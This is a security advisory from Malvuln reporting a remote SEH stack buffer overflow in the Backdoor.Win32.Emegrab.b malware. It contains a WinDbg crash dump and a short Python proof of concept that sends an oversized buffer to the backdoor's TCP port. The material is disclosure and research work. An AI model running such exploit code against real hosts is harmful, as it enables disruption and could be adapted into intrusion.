Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/19a14d0414aec62ef38378de2e8b259d.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Emegrab.b Vulnerability: Remote Stack Buffer Overflow (SEH) Family: Emegrab Type: PE32 MD5: 19a14d0414aec62ef38378de2e8b259d Vuln ID: MVID-2024-0675 ASLR: False DEP: False CFG: False Safe SEH: False Disclosure: 03/13/2024 Description: The malware listens on TCP port 2323 (typically) however, have seen it use 4823. On subsequent restarts it has used 3012, 3182, 4735, 4578, 4133, 5347, 4978 then eventually reuses port 2323. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH). Memory Dump: (14c0.b6c): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000 eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:009> .ecxr eax=00000000 ebx=00000000 ecx=41414141 edx=775e9d70 esi=00000000 edi=00000000 eip=41414141 esp=260013e8 ebp=26001408 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:009> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** WARNING: Unable to verify checksum for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e *** ERROR: Symbol file could not be found. Defaulted to export symbols for Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e - FAULTING_IP: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b 0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al EXCEPTION_RECORD: 260f5de8 -- (.exr 0x260f5de8) ExceptionAddress: 0040fa2b (Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0x0000fa2b) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 26100000 Attempt to write to address 26100000 PROCESS_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000008 EXCEPTION_PARAMETER2: 41414141 WRITE_ADDRESS: 41414141 FOLLOWUP_IP: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+fa2b 0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al FAILED_INSTRUCTION_ADDRESS: +fa2b 41414141 ?? ??? NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 IP_ON_HEAP: 41414141 IP_IN_FREE_BLOCK: 41414141 CONTEXT: 260f5e38 -- (.cxr 0x260f5e38) eax=00000041 ebx=00000000 ecx=0be58a88 edx=260f61e0 esi=00009cc8 edi=00433f74 eip=0040fa2b esp=260f6298 ebp=260fff80 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d+0xfa2b: 0040fa2b 888434a0000000 mov byte ptr [esp+esi+0A0h],al ss:002b:26100000=?? Resetting default scope FAULTING_THREAD: ffffffff BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 41414141 to 0040fa2b FRAME_ONE_INVALID: 1 STACK_TEXT: 260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b 260fff88 41414141 unknown!printable+0x0 260fff8c 41414141 unknown!printable+0x0 260fff90 41414141 unknown!printable+0x0 260fff94 41414141 unknown!printable+0x0 260fff98 41414141 unknown!printable+0x0 260fff9c 41414141 unknown!printable+0x0 260fffa0 41414141 unknown!printable+0x0 260fffa4 41414141 unknown!printable+0x0 260fffa8 41414141 unknown!printable+0x0 260fffac 41414141 unknown!printable+0x0 260fffb0 41414141 unknown!printable+0x0 260fffb4 41414141 unknown!printable+0x0 260fffb8 41414141 unknown!printable+0x0 260fffbc 41414141 unknown!printable+0x0 260fffc0 41414141 unknown!printable+0x0 260fffc4 41414141 unknown!printable+0x0 260fffc8 41414141 unknown!printable+0x0 260fffcc 41414141 unknown!printable+0x0 260fffd0 41414141 unknown!printable+0x0 260fffd4 41414141 unknown!printable+0x0 260fffd8 41414141 unknown!printable+0x0 260fffdc 41414141 unknown!printable+0x0 260fffe0 41414141 unknown!printable+0x0 260fffe4 41414141 unknown!printable+0x0 260fffe8 41414141 unknown!printable+0x0 260fffec 41414141 unknown!printable+0x0 260ffff0 41414141 unknown!printable+0x0 260ffff4 41414141 unknown!printable+0x0 260ffff8 41414141 unknown!printable+0x0 260ffffc 41414141 unknown!printable+0x0 26100000 41414141 unknown!printable+0x0 STACK_COMMAND: .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: backdoor_win32_emegrab_b+fa2b FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d IMAGE_NAME: Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e DEBUG_FLR_IMAGE_TIMESTAMP: 4a822c0e FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b 0:009> !exchain 260013fc: ntdll!ExecuteHandler2+44 (775e9d70) 260fffcc: 41414141 Invalid exception stack at 41414141 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=2323 s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PAYLOAD="A"*666 s.send(PAYLOAD.encode()) s.close() print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln") Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).